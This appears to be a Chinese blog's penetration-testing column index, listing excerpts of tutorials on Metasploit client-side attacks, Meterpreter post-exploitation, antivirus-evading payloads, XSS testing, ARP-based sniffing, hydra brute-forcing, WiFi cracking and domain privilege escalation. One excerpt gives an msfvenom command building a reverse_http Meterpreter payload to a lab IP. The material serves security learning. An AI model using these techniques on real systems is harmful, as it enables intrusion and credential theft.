渗透测试
文章平均质量分 75
zkwniky
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
metasploit之客户端渗透
0x00 概要我们在无法突破对方的网络边界的时候,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们想目标发一个含有后门的程序,或者是一个word文档、pdf文件。想要达到效果同时也要利用好社会工程学,来欺骗对方,使其中招。这篇文章中我们主要会使用到metasploit中的msfvenom这个工具,如果大家对msfvenom这个工具不了解的话可以参考我这篇博客:metasploit转载 2017-09-05 08:48:11 · 1361 阅读 · 0 评论 -
metasploit port 详细使用方法
信息收集:auxiliary/sniffer/psnuffle 嗅探抓包auxiliary/scanner/http/dir_scanner 扫描网站目录auxiliary/gather/search_email_collector转载 2017-09-20 09:20:27 · 2059 阅读 · 0 评论 -
文件包含漏洞原理分析
文件包含这个漏洞,用我自己的话来说就是程序员在网站设计中,为方便自己在设计构架时,使用了一些包含的函数,就像'文件包含'这几个字的字面意思一样,在文件中,包含一个文件。我在总结这篇文章的时候看了,其他人总结的,感觉别人总结的很是详细,就像一开始我只认为包含只有PHP代码中才存在,后来我再整理复习的时候,才发现,包含这个漏洞在各大语言中,都存在的,只不过现在大部分网站都是PHP网站,所以存在这个转载 2017-09-11 16:33:38 · 1641 阅读 · 0 评论 -
metasploit获取shell之后进一步利用!metasploit+sessions
当你用metasploit成功的入侵一台Windows主机后,你会获得一个Meterpreter 的Shell,今天我就会给大家讲一讲Meterpreter 获取shell以后的运用当你看到了[*] Meterpreter session 1 opened (192.168.195.140:4444 -> 192.168.195.139:1051) 这就代表这你在目标系统上成功的获得了转载 2017-09-02 16:56:32 · 10661 阅读 · 0 评论 -
使用MSF生成的shellcode打造免杀payload
环境:1.Kali攻击机IP:192.168.114.1402.使用win7生成exe步骤:使用msfvenom生成shellcode :msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f cwin7中使用Visual studio创建Win32控制台项目转载 2017-09-19 15:09:03 · 7659 阅读 · 0 评论 -
使用Burp Suite进行XSS渗透测试 (只为自己做个备忘,甚读)
使用Burp Suite进行XSS渗透测试测试环境:webgoat burp Suite 测试网址:http://192.168.1.104:8080/WebGoat/start.mvc#attack/1406352188/9001)在输入框中输入!@#$[]()"",返回 * Whoops, you entered [!@#$[]()""] instead of your thr原创 2017-09-01 13:25:12 · 6342 阅读 · 0 评论 -
Wireshark实战之局域网监听
直接上手网络工程师的最爱Wireshark.它是一款本地监听数据的大杀器,弊端是只能监听本地的数据,有什么办法可以让局域网中的流量都从本机走呢?第一ARP嗅探,劫持网关,再本地抓包.第二交换机镜像端口,在路由或者交换机处设置,复制一份数据到指定机子端口.第三Ap一个无线,让他们连接,然后再抓包.第一种方法不用考虑,第二种方法因为企业级路由才有镜像端口功能,我等屌丝用的TP-LINK无这转载 2017-09-24 11:03:54 · 42368 阅读 · 3 评论 -
火狐浏览器下burpsuite 抓取https数据包
1.环境Windows 10火狐浏览器51.0.1burpsuite pro1.7112.过程1)本人使用的是burpsuite 的默认代理设置 2)设置火狐的代理服务:选项 –>高级–>网络–>设置 配置成burpsuite 一样的地址和端口 3)在火狐中输入地址:http://burp 点击CA Certificate 下载证书转载 2017-09-15 01:17:29 · 3540 阅读 · 0 评论 -
Linux下使用hydra获取linux和windows系统用户名和密码的教程
本文主要记录了在linux中使用hydra破解并获取某个网段中linux和windows系统的登录名和密码。其中使用到的工具,例如,弱密码词典、用户名词典、shell脚本我都会传到我的资源里面。第一步:找到网段内存活的主机使用nmap工具查找存活的主机并存到up.txt里面,具体代码如下:在命令行输入:nmap -sn 172.18.16.0/24 > up.txt 从up.txt转载 2017-09-13 10:26:48 · 1121 阅读 · 0 评论 -
使用aircrack-ng工具破解wifi密码
目前无线网络加密技术日益成熟。以前的wep加密方式日渐淘汰,因为这种加密方式非常容易破解,当然现在还是有不少使用这种加密方式无线网络。现在大部分的无线网络都是使用wpa/wpa2方式来加密的,这种加密方式安全系数高,很难破解,当然这也不是不可能的。本文将教大家破解用wpa/wpa2加密方式的wifi密码。现在就让我们开始吧!工具(海淘回来的网卡):工具:TL-WN7转载 2017-09-13 10:35:55 · 2291 阅读 · 0 评论 -
域环境提权、编辑注册表
Token(令牌),域环境中提权用户每次登录时,账号绑定临时的token;访问资源时提交token进行身份验证,类似于web cookie。Delegate Token:交互会话登录,(例如直接登录、远程桌面登录)Impersonate Token:非交互登录,(例如访问文件共享)注意:在域环境中,Delegate Token账号注销后变成Impersonate Token转载 2017-09-20 11:27:35 · 1307 阅读 · 0 评论
分享